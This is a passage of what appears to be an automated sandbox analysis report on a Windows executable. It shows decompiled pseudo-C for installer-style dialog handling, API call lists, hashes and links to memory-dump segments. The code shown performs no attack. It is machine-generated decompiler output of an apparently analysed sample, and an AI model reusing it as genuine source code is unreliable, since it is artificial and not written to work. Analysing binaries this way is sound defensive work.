                							goto L93;
                						} else {
                							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                							if(_t232 == 0xffffffff) {
                								goto L93;
                							}
                							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                								_t294 = 0x20;
                							}
                							E00401299(_t294);
                							SendMessageW(_a4, 0x420, 0, _t294);
                							_a12 = _a12 | 0xffffffff;
                							_a16 = 0;
                							_a8 = 0x40f;
                							goto L56;
                						}
                					}
                				} else {
                					_v36 = 0;
                					_v20 = 2;
                					 *0x434f60 = _t291;
                					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                					 *0x42d254 =  *0x42d254 | 0xffffffff;
                					_t297 = _t258;
                					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                					 *0x42d24c = _t260;
                					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                						SendMessageW(_v8, 0x111b, 0x10, 0);
                					}
                					DeleteObject(_t297);
                					_t298 = 0;
                					do {
                						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                							if(_t298 != 0x20) {
                								_v20 = 0;
                							}
                							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                						}
                						_t298 = _t298 + 1;
                					} while (_t298 < 0x21);
                					_t299 = _a16;
                					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                					_push(0x15);
                					E00404499(_a4);
                					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                					_push(0x16);
                					E00404499(_a4);
                					_t300 = 0;
                					_v16 = 0;
                					if( *0x434f2c <= 0) {
                						L19:
                						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                						goto L20;
                					} else {
                						_t319 = _v24 + 8;
                						_v32 = _t319;
                						do {
                							_t278 =  &(_t319[0x10]);
                							if( *_t278 != 0) {
                								_v64 = _t278;
                								_t279 =  *_t319;
                								_v88 = _v16;
                								_t311 = 0x20;
                								_v84 = 0xffff0002;
                								_v80 = 0xd;
                								_v68 = _t311;
                								_v44 = _t300;
                								_v72 = _t279 & _t311;
                								if((_t279 & 0x00000002) == 0) {
                									if((_t279 & 0x00000004) == 0) {
                										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                									} else {
                										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                									}
                								} else {
                									_v80 = 0x4d;
                									_v48 = 1;
                									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                									_v36 = 1;
                									 *( *0x42d260 + _t300 * 4) = _t284;
                									_v16 =  *( *0x42d260 + _t300 * 4);
                								}
                							}
                							_t300 = _t300 + 1;
                							_t319 =  &(_v32[0x818]);
                							_v32 = _t319;
                						} while (_t300 <  *0x434f2c);
                						if(_v36 != 0) {
                							L20:
                							if(_v20 != 0) {
                								E004044CE(_v8);
                								goto L23;
                							} else {
                								ShowWindow(_v12, 5);
                								E004044CE(_v12);
                								L93:
                								return E00404500(_a8, _a12, _a16);
                							}
                						}
                						goto L19;
                					}
                				}
                			}


























































                0x00404f0d
                0x00404f26
                0x00404f2b
                0x00404f33
                0x00404f39
                0x00404f4f
                0x00404f52
                0x0040517d
                0x00405184
                0x00405198
                0x00405186
                0x00405188
                0x0040518b
                0x0040518c
                0x00405193
                0x00405193
                0x004051a4
                0x004051b2
                0x004051b5
                0x004051cb
                0x00405240
                0x00405243
                0x00405245
                0x0040524f
                0x0040525d
                0x0040525d
                0x0040525f
                0x00405269
                0x0040526f
                0x00405272
                0x00405275
                0x00405290
                0x00405277
                0x00405281
                0x00405281
                0x00405275
                0x00405269
                0x00000000
                0x00405243
                0x004051d0
                0x004051db
                0x004051e0
                0x004051e7
                0x004051ec
                0x004051f0
                0x004051fb
                0x004051fb
                0x004051ff
                0x00405203
                0x00405207
                0x0040521a
                0x00405209
                0x00405209
                0x00405210
                0x00405216
                0x00405212
                0x00405212
                0x00405212
                0x00405210
                0x0040521e
                0x00405220
                0x00405233
                0x00405236
                0x00405239
                0x00405239
                0x00405203
                0x00000000
                0x004051f0
                0x004051d2
                0x004051d9
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405293
                0x00405293
                0x0040529a
                0x0040530b
                0x00405313
                0x0040531b
                0x0040531b
                0x00405324
                0x00405326
                0x0040532d
                0x00405330
                0x00405330
                0x00405336
                0x0040533d
                0x00405340
                0x00405340
                0x00405346
                0x0040534c
                0x00405352
                0x00405352
                0x0040535f
                0x004054c0
                0x004054c7
                0x004054e4
                0x004054ea
                0x004054fc
                0x004054fc
                0x00000000
                0x00405365
                0x00405367
                0x0040536c
                0x00405371
                0x00405376
                0x00405378
                0x00405378
                0x00405379
                0x0040537a
                0x0040537c
                0x0040537c
                0x00405384
                0x004053c5
                0x004053c7
                0x004053d7
                0x004053da
                0x004053df
                0x004053e6
                0x004053e9
                0x0040548b
                0x00405494
                0x0040549c
                0x0040549c
                0x004054aa
                0x004054bb
                0x004054bb
                0x00000000
                0x004054aa
                0x004053ef
                0x004053f2
                0x004053f8
                0x004053fd
                0x004053ff
                0x00405401
                0x00405407
                0x0040540e
                0x00405413
                0x0040541a
                0x0040541d
                0x0040541d
                0x00405424
                0x00405430
                0x00405434
                0x00405436
                0x00405436
                0x00405426
                0x00405428
                0x00405428
                0x00405456
                0x00405462
                0x00405471
                0x00405471
                0x00405473
                0x00405476
                0x0040547f
                0x00000000
                0x00405386
                0x00405391
                0x00405394
                0x00405399
                0x0040539b
                0x0040539f
                0x004053af
                0x004053b9
                0x004053bb
                0x004053be
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004053a1
                0x004053a1
                0x004053a7
                0x004053a9
                0x004053a9
                0x004053aa
                0x004053ab
                0x00000000
                0x004053a1
                0x00405384
                0x0040535f
                0x004052a2
                0x00000000
                0x004052b8
                0x004052c2
                0x004052c7
                0x00000000
                0x00000000
                0x004052d9
                0x004052de
                0x004052ea
                0x004052ea
                0x004052ec
                0x004052fb
                0x004052fd
                0x00405301
                0x00405304
                0x00000000
                0x00405304
                0x004052a2
                0x00404f58
                0x00404f5d
                0x00404f66
                0x00404f6d
                0x00404f7f
                0x00404f8a
                0x00404f90
                0x00404f9e
                0x00404fb2
                0x00404fb7
                0x00404fc4
                0x00404fc9
                0x00404fdf
                0x00404ff0
                0x00404ffd
                0x00404ffd
                0x00405000
                0x00405006
                0x00405008
                0x0040500b
                0x00405010
                0x00405015
                0x00405017
                0x00405017
                0x00405037
                0x00405037
                0x00405039
                0x0040503a
                0x0040503f
                0x00405045
                0x00405049
                0x0040504e
                0x00405056
                0x0040505a
                0x0040505f
                0x00405064
                0x0040506c
                0x0040506f
                0x0040513f
                0x00405152
                0x00000000
                0x00405075
                0x00405078
                0x0040507b
                0x0040507e
                0x0040507e
                0x00405084
                0x0040508d
                0x00405090
                0x00405094
                0x00405097
                0x0040509a
                0x004050a3
                0x004050ac
                0x004050af
                0x004050b2
                0x004050b5
                0x004050f3
                0x0040511e
                0x004050f5
                0x00405104
                0x00405104
                0x004050b7
                0x004050ba
                0x004050c8
                0x004050d2
                0x004050da
                0x004050e1
                0x004050ec
                0x004050ec
                0x004050b5
                0x00405124
                0x00405125
                0x00405131
                0x00405131
                0x0040513d
                0x00405158
                0x0040515b
                0x00405178
                0x00000000
                0x0040515d
                0x00405162
                0x0040516b
                0x004054fe
                0x00405510
                0x00405510
                0x0040515b
                0x00000000
                0x0040513d
                0x0040506f

                APIs
                • GetDlgItem.USER32 ref: 00404F1E
                • GetDlgItem.USER32 ref: 00404F29
                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                • LoadImageW.USER32 ref: 00404F8A
                • SetWindowLongW.USER32 ref: 00404FA3
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                • DeleteObject.GDI32(00000000), ref: 00405000
                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                • SetWindowLongW.USER32 ref: 00405152
                • ShowWindow.USER32(?,00000005), ref: 00405162
                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                • GlobalFree.KERNEL32 ref: 00405340
                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                • ShowWindow.USER32(?,00000000), ref: 004054EA
                • GetDlgItem.USER32 ref: 004054F5
                • ShowWindow.USER32(00000000), ref: 004054FC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                • String ID: $M$N
                • API String ID: 2564846305-813528018
                • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                				struct HWND__* _v28;
                				void* _v84;
                				void* _v88;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t34;
                				signed int _t36;
                				signed int _t38;
                				struct HWND__* _t48;
                				signed int _t67;
                				struct HWND__* _t73;
                				signed int _t86;
                				struct HWND__* _t91;
                				signed int _t99;
                				int _t103;
                				signed int _t117;
                				int _t118;
                				int _t122;
                				signed int _t124;
                				struct HWND__* _t127;
                				struct HWND__* _t128;
                				int _t129;
                				intOrPtr _t130;
                				long _t133;
                				int _t135;
                				int _t136;
                				void* _t137;
                
                				_t130 = _a8;
                				if(_t130 == 0x110 || _t130 == 0x408) {
                					_t34 = _a12;
                					_t127 = _a4;
                					__eflags = _t130 - 0x110;
                					 *0x42d250 = _t34;
                					if(_t130 == 0x110) {
                						 *0x434f08 = _t127;
                						 *0x42d264 = GetDlgItem(_t127, 1);
                						_t91 = GetDlgItem(_t127, 2);
                						_push(0xffffffff);
                						_push(0x1c);
                						 *0x42b230 = _t91;
                						E00404499(_t127);
                						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
                						 *0x433ecc = E0040140B(4);
                						_t34 = 1;
                						__eflags = 1;
                						 *0x42d250 = 1;
                					}
                					_t124 =  *0x40a368; // 0xffffffff
                					_t136 = 0;
                					_t133 = (_t124 << 6) +  *0x434f20;
                					__eflags = _t124;
                					if(_t124 < 0) {
                						L36:
                						E004044E5(0x40b);
                						while(1) {
                							_t36 =  *0x42d250;
                							 *0x40a368 =  *0x40a368 + _t36;
                							_t133 = _t133 + (_t36 << 6);
                							_t38 =  *0x40a368; // 0xffffffff
                							__eflags = _t38 -  *0x434f24;
                							if(_t38 ==  *0x434f24) {
                								E0040140B(1);
                							}
                							__eflags =  *0x433ecc - _t136;
                							if( *0x433ecc != _t136) {
                								break;
                							}
                							__eflags =  *0x40a368 -  *0x434f24; // 0xffffffff
                							if(__eflags >= 0) {
                								break;
                							}
                							_t117 =  *(_t133 + 0x14);
                							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                							_push( *((intOrPtr*)(_t133 + 0x20)));
                							_push(0xfffffc19);
                							E00404499(_t127);
                							_push( *((intOrPtr*)(_t133 + 0x1c)));
                							_push(0xfffffc1b);
                							E00404499(_t127);
                							_push( *((intOrPtr*)(_t133 + 0x28)));
                							_push(0xfffffc1a);
                							E00404499(_t127);
                							_t48 = GetDlgItem(_t127, 3);
                							__eflags =  *0x434f8c - _t136;
                							_v28 = _t48;
                							if( *0x434f8c != _t136) {
                								_t117 = _t117 & 0x0000fefd | 0x00000004;
                								__eflags = _t117;
                							}
                							ShowWindow(_t48, _t117 & 0x00000008);
                							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                							E004044BB(_t117 & 0x00000002);
                							_t118 = _t117 & 0x00000004;
                							EnableWindow( *0x42b230, _t118);
                							__eflags = _t118 - _t136;
                							if(_t118 == _t136) {
                								_push(1);
                							} else {
                								_push(_t136);
                							}
                							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                							__eflags =  *0x434f8c - _t136;
                							if( *0x434f8c == _t136) {
                								_push( *0x42d264);
                							} else {
                								SendMessageW(_t127, 0x401, 2, _t136);
                								_push( *0x42b230);
                							}
                							E004044CE();
                							E0040653D(0x42d268, E00403F7B());
                							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                							SetWindowTextW(_t127, 0x42d268);
                							_push(_t136);
                							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                							__eflags = _t67;
                							if(_t67 != 0) {
                								continue;
                							} else {
                								__eflags =  *_t133 - _t136;
                								if( *_t133 == _t136) {
                									continue;
                								}
                								__eflags =  *(_t133 + 4) - 5;
                								if( *(_t133 + 4) != 5) {
                									DestroyWindow( *0x433ed8);
                									 *0x42c240 = _t133;
                									__eflags =  *_t133 - _t136;
                									if( *_t133 <= _t136) {
                										goto L60;
                									}
                									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *(0x40a36c +  *(_t133 + 4) * 4), _t133);
                									__eflags = _t73 - _t136;
                									 *0x433ed8 = _t73;
                									if(_t73 == _t136) {
                										goto L60;
                									}
                									_push( *((intOrPtr*)(_t133 + 0x2c)));
                									_push(6);
                									E00404499(_t73);
                									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                									ScreenToClient(_t127, _t137 + 0x10);
                									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                									_push(_t136);
                									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                									__eflags =  *0x433ecc - _t136;
                									if( *0x433ecc != _t136) {
                										goto L63;
                									}
                									ShowWindow( *0x433ed8, 8);
                									E004044E5(0x405);
                									goto L60;
                								}
                								__eflags =  *0x434f8c - _t136;
                								if( *0x434f8c != _t136) {
                									goto L63;
                								}
                								__eflags =  *0x434f80 - _t136;
                								if( *0x434f80 != _t136) {
                									continue;
                								}
                								goto L63;
                							}
                						}
                						DestroyWindow( *0x433ed8);
                						 *0x434f08 = _t136;
                						EndDialog(_t127,  *0x42ba38);
                						goto L60;
                					} else {
                						__eflags = _t34 - 1;
                						if(_t34 != 1) {
                							L35:
                							__eflags =  *_t133 - _t136;
                							if( *_t133 == _t136) {
                								goto L63;
                							}
                							goto L36;
                						}
                						_push(0);
                						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                						__eflags = _t86;
                						if(_t86 == 0) {
                							goto L35;
                						}
                						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                						__eflags =  *0x433ecc;
                						return 0 |  *0x433ecc == 0x00000000;
                					}
                				} else {
                					_t127 = _a4;
                					_t136 = 0;
                					if(_t130 == 0x47) {
                						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                					}
                					_t122 = _a12;
                					if(_t130 != 5) {
                						L8:
                						if(_t130 != 0x40d) {
                							__eflags = _t130 - 0x11;
                							if(_t130 != 0x11) {
                								__eflags = _t130 - 0x111;
                								if(_t130 != 0x111) {
                									goto L28;
                								}
                								_t135 = _t122 & 0x0000ffff;
                								_t128 = GetDlgItem(_t127, _t135);
                								__eflags = _t128 - _t136;
                								if(_t128 == _t136) {
                									L15:
                									__eflags = _t135 - 1;
                									if(_t135 != 1) {
                										__eflags = _t135 - 3;
                										if(_t135 != 3) {
                											_t129 = 2;
                											__eflags = _t135 - _t129;
                											if(_t135 != _t129) {
                												L27:
                												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                												goto L28;
                											}
                											__eflags =  *0x434f8c - _t136;
                											if( *0x434f8c == _t136) {
                												_t99 = E0040140B(3);
                												__eflags = _t99;
                												if(_t99 != 0) {
                													goto L28;
                												}
                												 *0x42ba38 = 1;
                												L23:
                												_push(0x78);
                												L24:
                												E00404472();
                												goto L28;
                											}
                											E0040140B(_t129);
                											 *0x42ba38 = _t129;
                											goto L23;
                										}
                										__eflags =  *0x40a368 - _t136; // 0xffffffff
                										if(__eflags <= 0) {
                											goto L27;
                										}
                										_push(0xffffffff);
                										goto L24;
                									}
                									_push(_t135);
                									goto L24;
                								}
                								SendMessageW(_t128, 0xf3, _t136, _t136);
                								_t103 = IsWindowEnabled(_t128);
                								__eflags = _t103;
                								if(_t103 == 0) {
                									L63:
                									return 0;
                								}
                								goto L15;
                							}
                							SetWindowLongW(_t127, _t136, _t136);
                							return 1;
                						}
                						DestroyWindow( *0x433ed8);
                						 *0x433ed8 = _t122;
                						L60:
                						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
                							ShowWindow(_t127, 0xa);
                							 *0x42f268 = 1;
                						}
                						goto L63;
                					} else {
                						asm("sbb eax, eax");
                						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                							L28:
                							return E00404500(_a8, _t122, _a16);
                						} else {
                							ShowWindow(_t127, 4);
                							goto L8;
                						}
                					}
                				}
                			}































                0x00403fa5
                0x00403fac
                0x00404113
                0x00404117
                0x0040411b
                0x0040411d
                0x00404122
                0x0040412d
                0x00404138
                0x0040413d
                0x0040413f
                0x00404141
                0x00404144
                0x00404149
                0x00404157
                0x00404164
                0x0040416b
                0x0040416b
                0x0040416c
                0x0040416c
                0x00404171
                0x00404177
                0x0040417e
                0x00404184
                0x00404186
                0x004041c6
                0x004041cb
                0x004041d0
                0x004041d0
                0x004041d5
                0x004041de
                0x004041e0
                0x004041e5
                0x004041eb
                0x004041ef
                0x004041ef
                0x004041f4
                0x004041fa
                0x00000000
                0x00000000
                0x00404205
                0x0040420b
                0x00000000
                0x00000000
                0x00404214
                0x0040421c
                0x00404221
                0x00404224
                0x0040422a
                0x0040422f
                0x00404232
                0x00404238
                0x0040423d
                0x00404240
                0x00404246
                0x0040424e
                0x00404254
                0x0040425a
                0x0040425e
                0x00404265
                0x00404265
                0x00404265
                0x0040426f
                0x00404281
                0x0040428d
                0x00404292
                0x0040429c
                0x004042a2
                0x004042a4
                0x004042a9
                0x004042a6
                0x004042a6
                0x004042a6
                0x004042b9
                0x004042d1
                0x004042d3
                0x004042d9
                0x004042ee
                0x004042db
                0x004042e4
                0x004042e6
                0x004042e6
                0x004042f4
                0x00404305
                0x0040431b
                0x00404322
                0x00404328
                0x0040432c
                0x00404331
                0x00404333
                0x00000000
                0x00404339
                0x00404339
                0x0040433b
                0x00000000
                0x00000000
                0x00404341
                0x00404345
                0x0040436a
                0x00404370
                0x00404376
                0x00404378
                0x00000000
                0x00000000
                0x0040439e
                0x004043a4
                0x004043a6
                0x004043ab
                0x00000000
                0x00000000
                0x004043b1
                0x004043b4
                0x004043b7
                0x004043ce
                0x004043da
                0x004043f3
                0x004043f9
                0x004043fd
                0x00404402
                0x00404408
                0x00000000
                0x00000000
                0x00404412
                0x0040441d
                0x00000000
                0x0040441d
                0x00404347
                0x0040434d
                0x00000000
                0x00000000
                0x00404353
                0x00404359
                0x00000000
                0x00000000
                0x00000000
                0x0040435f
                0x00404333
                0x0040442a
                0x00404436
                0x0040443d
                0x00000000
                0x00404188
                0x00404188
                0x0040418b
                0x004041be
                0x004041be
                0x004041c0
                0x00000000
                0x00000000
                0x00000000
                0x004041c0
                0x0040418d
                0x00404191
                0x00404196
                0x00404198
                0x00000000
                0x00000000
                0x004041a8
                0x004041b0
                0x00000000
                0x004041b6
                0x00403fbe
                0x00403fbe
                0x00403fc2
                0x00403fc7
                0x00403fd6
                0x00403fd6
                0x00403fdc
                0x00403fe3
                0x00404027
                0x0040402d
                0x00404046
                0x00404049
                0x0040405c
                0x00404062
                0x00000000
                0x00000000
                0x00404068
                0x00404073
                0x00404075
                0x00404077
                0x00404096
                0x00404096
                0x00404099
                0x0040409e
                0x004040a1
                0x004040b1
                0x004040b2
                0x004040b4
                0x004040ea
                0x004040fa
                0x00000000
                0x004040fa
                0x004040b6
                0x004040bc
                0x004040d5
                0x004040da
                0x004040dc
                0x00000000
                0x00000000
                0x004040de
                0x004040ca
                0x004040ca
                0x004040cc
                0x004040cc
                0x00000000
                0x004040cc
                0x004040bf
                0x004040c4
                0x00000000
                0x004040c4
                0x004040a3
                0x004040a9
                0x00000000
                0x00000000
                0x004040ab
                0x00000000
                0x004040ab
                0x0040409b
                0x00000000
                0x0040409b
                0x00404081
                0x00404088
                0x0040408e
                0x00404090
                0x00404466
                0x00000000
                0x00404466
                0x00000000
                0x00404090
                0x0040404e
                0x00000000
                0x00404056
                0x00404035
                0x0040403b
                0x00404443
                0x00404449
                0x00404456
                0x0040445c
                0x0040445c
                0x00000000
                0x00403fe5
                0x00403fea
                0x00403ff6
                0x00403fff
                0x00404100
                0x00000000
                0x0040401e
                0x00404021
                0x00000000
                0x00404021
                0x00403fff
                0x00403fe3

                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                • ShowWindow.USER32(?), ref: 00403FF6
                • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                • ShowWindow.USER32(?,00000004), ref: 00404021
                • DestroyWindow.USER32 ref: 00404035
                • SetWindowLongW.USER32 ref: 0040404E
                • GetDlgItem.USER32 ref: 0040406D
                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                • IsWindowEnabled.USER32(00000000), ref: 00404088
                • GetDlgItem.USER32 ref: 00404133
                • GetDlgItem.USER32 ref: 0040413D
                • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                • GetDlgItem.USER32 ref: 0040424E
                • ShowWindow.USER32(00000000,?), ref: 0040426F
                • EnableWindow.USER32(?,?), ref: 00404281
                • EnableWindow.USER32(?,?), ref: 0040429C
                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                • EnableMenuItem.USER32 ref: 004042B9
                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                • ShowWindow.USER32(?,0000000A), ref: 00404456
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                • String ID:
                • API String ID: 1860320154-0
                • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                				intOrPtr _v8;
                				int _v12;
                				void* _v16;
                				struct HWND__* _t56;
                				signed int _t75;
                				signed short* _t76;
                				signed short* _t78;
                				long _t92;
                				int _t103;
                				signed int _t110;
                				intOrPtr _t113;
                				WCHAR* _t114;
                				signed int* _t116;
                				WCHAR* _t117;
                				struct HWND__* _t118;
                
                				if(_a8 != 0x110) {
                					if(_a8 != 0x111) {
                						L13:
                						if(_a8 != 0x4e) {
                							if(_a8 == 0x40b) {
                								 *0x42b234 =  *0x42b234 + 1;
                							}
                							L27:
                							_t114 = _a16;
                							L28:
                							return E00404500(_a8, _a12, _t114);
                						}
                						_t56 = GetDlgItem(_a4, 0x3e8);
                						_t114 = _a16;
                						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                							_v12 = _t103;
                							_v16 = _t113;
                							_v8 = 0x432ea0;
                							if(_t103 - _t113 < 0x800) {
                								SendMessageW(_t56, 0x44b, 0,  &_v16);
                								SetCursor(LoadCursorW(0, 0x7f02));
                								_push(1);
                								E00404907(_a4, _v8);
                								SetCursor(LoadCursorW(0, 0x7f00));
                								_t114 = _a16;
                							}
                						}
                						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                							goto L28;
                						} else {
                							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                								SendMessageW( *0x434f08, 0x111, 1, 0);
                							}
                							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                								SendMessageW( *0x434f08, 0x10, 0, 0);
                							}
                							return 1;
                						}
                					}
                					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                						goto L27;
                					} else {
                						_t116 =  *0x42c240 + 0x14;
                						if(( *_t116 & 0x00000020) == 0) {
                							goto L27;
                						}
                						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                						E004048E3();
                						goto L13;
                					}
                				}
                				_t117 = _a16;
                				_t75 =  *(_t117 + 0x30);
                				if(_t75 < 0) {
                					_t75 =  *( *0x433edc - 4 + _t75 * 4);
                				}
                				_t76 =  *0x434f38 + _t75 * 2;
                				_t110 =  *_t76 & 0x0000ffff;
                				_a8 = _t110;
